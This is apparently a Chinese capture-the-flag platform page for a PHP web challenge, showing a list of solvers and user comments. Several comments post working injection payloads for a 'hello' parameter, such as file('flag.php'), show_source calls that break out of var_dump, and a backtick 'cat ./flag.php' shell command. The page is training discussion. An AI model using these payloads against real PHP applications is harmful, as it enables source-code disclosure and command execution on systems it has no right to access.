评分(9)
解题动态
vloat 攻破了该题 3分钟前
aran 攻破了该题 2小时前
luo220 攻破了该题 11小时前
aqwzaa 攻破了该题 12小时前
consolec 攻破了该题 12小时前
18984776156 攻破了该题 16小时前
15936678156 攻破了该题 17小时前
等保工具人 攻破了该题 1天前
heping 攻破了该题 1天前
weini12345 攻破了该题 1天前
jhy0117 攻破了该题 1天前
AuroraHashcat 攻破了该题 1天前
oopyman 攻破了该题 1天前
15080841307 攻破了该题 1天前
yimo 攻破了该题 2天前
asdwtwty 攻破了该题 2天前
陈几何时 攻破了该题 2天前
Ethan丶 攻破了该题 2天前
清风青峰f 攻破了该题 2天前
评论
luoyao 3年前
举报
?hello=file("flag.php")
luyisie 3年前
举报
file // show_source // highlight_file
wwgy9981 3年前
举报
flag = 'Too Young Too Simple‘
kavin 3年前
举报
明白了原理,用bp搞了一轮,发现hello=show_source('flag.php')可行
kuaiting 3年前
举报
使用?hello=file('flag.php') 或者?hello=show_source('flag.php') 等可以读取源码的函数 或者构造var_dump($a) 闭合
陈江川0118 3年前
举报
简单来说就是利用file函数把flag.php的内容存到一个数组中,然后打印出来数组的内容即可
trackboy 3年前
举报
?hello=file(%22flag.php%22) ?hello=file_get_contents(%27flag.php%27) ?hello=1);show_source(%27flag.php%27);var_dump( ?hello=);echo%20`cat%20./flag.php`;//
lgb236277484 3年前
举报
highlight_file()
mingshen 3年前
举报
PHP show_source() 杂项函数,或者file协议读取文件内容
linkzoom 3年前
举报
离谱,cat啥啊真的是...
ctf20210817 3年前
举报
确实是cat就可以